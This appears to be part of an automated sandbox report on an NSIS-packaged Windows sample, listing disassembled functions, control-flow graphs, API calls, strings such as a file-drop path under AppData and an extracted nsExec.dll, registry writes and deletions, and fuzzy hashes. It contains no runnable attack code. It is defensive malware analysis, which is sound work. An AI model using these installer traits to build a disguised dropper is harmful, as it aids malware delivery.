                                                              control_flow_graph 703 4032b9-4032d0 704 4032d2 703->704 705 4032d9-4032e2 703->705 704->705 706 4032e4 705->706 707 4032eb-4032f0 705->707 706->707 708 403300-40330d call 4034d4 707->708 709 4032f2-4032fb call 4034ea 707->709 713 4034c2 708->713 714 403313-403317 708->714 709->708 715 4034c4-4034c5 713->715 716 40346d-40346f 714->716 717 40331d-403366 GetTickCount 714->717 720 4034cd-4034d1 715->720 718 403471-403474 716->718 719 4034af-4034b2 716->719 721 4034ca 717->721 722 40336c-403374 717->722 718->721 725 403476 718->725 723 4034b4 719->723 724 4034b7-4034c0 call 4034d4 719->724 721->720 726 403376 722->726 727 403379-403387 call 4034d4 722->727 723->724 724->713 735 4034c7 724->735 729 403479-40347f 725->729 726->727 727->713 737 40338d-403396 727->737 732 403481 729->732 733 403483-403491 call 4034d4 729->733 732->733 733->713 741 403493-40349f call 4060f9 733->741 735->721 738 40339c-4033bc call 406aa6 737->738 745 4033c2-4033d5 GetTickCount 738->745 746 403465-403467 738->746 747 4034a1-4034ab 741->747 748 403469-40346b 741->748 749 403420-403422 745->749 750 4033d7-4033df 745->750 746->715 747->729 751 4034ad 747->751 748->715 754 403424-403428 749->754 755 403459-40345d 749->755 752 4033e1-4033e5 750->752 753 4033e7-403418 MulDiv wsprintfW call 4055dc 750->753 751->721 752->749 752->753 761 40341d 753->761 758 40342a-403431 call 4060f9 754->758 759 40343f-40344a 754->759 755->722 756 403463 755->756 756->721 764 403436-403438 758->764 760 40344d-403451 759->760 760->738 763 403457 760->763 761->749 763->721 764->748 765 40343a-40343d 764->765 765->760
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CountTick$wsprintf
                                                              • String ID: *B$ FB$ A$ A$... %d%%
                                                              • API String ID: 551687249-3833040932
                                                              • Opcode ID: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                                              • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                                              • Opcode Fuzzy Hash: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                                              • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99
                                                              Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 766 401774-401799 call 402dab call 405e9d 771 4017a3-4017b5 call 406557 call 405e26 lstrcatW 766->771 772 40179b-4017a1 call 406557 766->772 777 4017ba-4017bb call 406805 771->777 772->777 781 4017c0-4017c4 777->781 782 4017c6-4017d0 call 4068b4 781->782 783 4017f7-4017fa 781->783 790 4017e2-4017f4 782->790 791 4017d2-4017e0 CompareFileTime 782->791 785 401802-40181e call 406047 783->785 786 4017fc-4017fd call 406022 783->786 793 401820-401823 785->793 794 401892-4018bb call 4055dc call 4032b9 785->794 786->785 790->783 791->790 796 401874-40187e call 4055dc 793->796 797 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 793->797 808 4018c3-4018cf SetFileTime 794->808 809 4018bd-4018c1 794->809 806 401887-40188d 796->806 797->781 829 401869-40186a 797->829 810 402c38 806->810 812 4018d5-4018e0 CloseHandle 808->812 809->808 809->812 816 402c3a-402c3e 810->816 814 4018e6-4018e9 812->814 815 402c2f-402c32 812->815 818 4018eb-4018fc call 406594 lstrcatW 814->818 819 4018fe-401901 call 406594 814->819 815->810 823 401906-4023a7 call 405bb7 818->823 819->823 823->815 823->816 829->806 831 40186c-40186d 829->831 831->796
                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000,Exec,C:\Users\user\AppData\Local\acneform\Tjenestepligterne,?,?,00000031), ref: 004017B5
                                                              • CompareFileTime.KERNEL32(-00000014,?,Exec,Exec,00000000,00000000,Exec,C:\Users\user\AppData\Local\acneform\Tjenestepligterne,?,?,00000031), ref: 004017DA
                                                                • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0), ref: 00405637
                                                                • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll), ref: 00405649
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsbB152.tmp$C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll$C:\Users\user\AppData\Local\acneform\Tjenestepligterne$Exec
                                                              • API String ID: 1941528284-4220020715
                                                              • Opcode ID: 6570eeae84e5bb265c2249ceb719c511b69c24445da543620ab3fdc205d1b951
                                                              • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                                              • Opcode Fuzzy Hash: 6570eeae84e5bb265c2249ceb719c511b69c24445da543620ab3fdc205d1b951
                                                              • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D
                                                              Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 832 4055dc-4055f1 833 4055f7-405608 832->833 834 4056a8-4056ac 832->834 835 405613-40561f lstrlenW 833->835 836 40560a-40560e call 406594 833->836 838 405621-405631 lstrlenW 835->838 839 40563c-405640 835->839 836->835 838->834 840 405633-405637 lstrcatW 838->840 841 405642-405649 SetWindowTextW 839->841 842 40564f-405653 839->842 840->839 841->842 843 405655-405697 SendMessageW * 3 842->843 844 405699-40569b 842->844 843->844 844->834 845 40569d-4056a0 844->845 845->834
                                                              APIs
                                                              • lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                              • lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                              • lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0), ref: 00405637
                                                              • SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll), ref: 00405649
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID: Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll
                                                              • API String ID: 2531174081-4072277442
                                                              • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                              • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                                              • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                              • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8
                                                              Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 846 4068db-4068fb GetSystemDirectoryW 847 4068fd 846->847 848 4068ff-406901 846->848 847->848 849 406912-406914 848->849 850 406903-40690c 848->850 852 406915-406948 wsprintfW LoadLibraryExW 849->852 850->849 851 40690e-406910 850->851 851->852
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                              • wsprintfW.USER32 ref: 0040692D
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%S.dll$UXTHEME
                                                              • API String ID: 2200240437-1106614640
                                                              • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                              • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                              • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                              • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8
                                                              Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 853 402eae-402ed7 call 4063c4 855 402edc-402ee0 853->855 856 402f91-402f95 855->856 857 402ee6-402eea 855->857 858 402eec-402f0d RegEnumValueW 857->858 859 402f0f-402f22 857->859 858->859 860 402f76-402f84 RegCloseKey 858->860 861 402f4b-402f52 RegEnumKeyW 859->861 860->856 862 402f24-402f26 861->862 863 402f54-402f66 RegCloseKey call 40694b 861->863 862->860 864 402f28-402f3c call 402eae 862->864 869 402f86-402f8c 863->869 870 402f68-402f74 RegDeleteKeyW 863->870 864->863 871 402f3e-402f4a 864->871 869->856 870->856 871->861
                                                              APIs
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseEnum$DeleteValue
                                                              • String ID:
                                                              • API String ID: 1354259210-0
                                                              • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                              • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                                              • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                              • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
                                                              Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 872 401c48-401c68 call 402d89 * 2 877 401c74-401c78 872->877 878 401c6a-401c71 call 402dab 872->878 880 401c84-401c8a 877->880 881 401c7a-401c81 call 402dab 877->881 878->877 884 401cd8-401d02 call 402dab * 2 FindWindowExW 880->884 885 401c8c-401ca8 call 402d89 * 2 880->885 881->880 897 401d08 884->897 895 401cc8-401cd6 SendMessageW 885->895 896 401caa-401cc6 SendMessageTimeoutW 885->896 895->897 898 401d0b-401d0e 896->898 897->898 899 401d14 898->899 900 402c2f-402c3e 898->900 899->900
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                              • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                                              • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                              • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                                              Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 903 40248f-4024c0 call 402dab * 2 call 402e3b 910 4024c6-4024d0 903->910 911 402c2f-402c3e 903->911 912 4024d2-4024df call 402dab lstrlenW 910->912 913 4024e3-4024e6 910->913 912->913 917 4024e8-4024f9 call 402d89 913->917 918 4024fa-4024fd 913->918 917->918 920 40250e-402522 RegSetValueExW 918->920 921 4024ff-402509 call 4032b9 918->921 925 402524 920->925 926 402527-402608 RegCloseKey 920->926 921->920 925->926 926->911 928 402933-40293a 926->928 928->911
                                                              APIs
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000023,00000011,00000002), ref: 004024DA
                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,00000011,00000002), ref: 0040251A
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,00000011,00000002), ref: 00402602
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseValuelstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsbB152.tmp
                                                              • API String ID: 2655323295-627501760
                                                              • Opcode ID: f78f700b530699748f9fad481ce2e67ea2ae6cf6ef13030ba4708d919309f38a
                                                              • Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
                                                              • Opcode Fuzzy Hash: f78f700b530699748f9fad481ce2e67ea2ae6cf6ef13030ba4708d919309f38a
                                                              • Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58
                                                              Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00406094
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-1331003597
                                                              • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                              • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                                              • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                              • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768
                                                              Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                • Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\acneform\Tjenestepligterne,?,00000000,000000F0), ref: 00401652
                                                              Strings
                                                              • C:\Users\user\AppData\Local\acneform\Tjenestepligterne, xrefs: 00401645
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\AppData\Local\acneform\Tjenestepligterne
                                                              • API String ID: 1892508949-3042626848
                                                              • Opcode ID: 3fdecb0bba39e703bf4163983f1431fe553617167f418b1ef3a8f15efc1dcdc7
                                                              • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                                              • Opcode Fuzzy Hash: 3fdecb0bba39e703bf4163983f1431fe553617167f418b1ef3a8f15efc1dcdc7
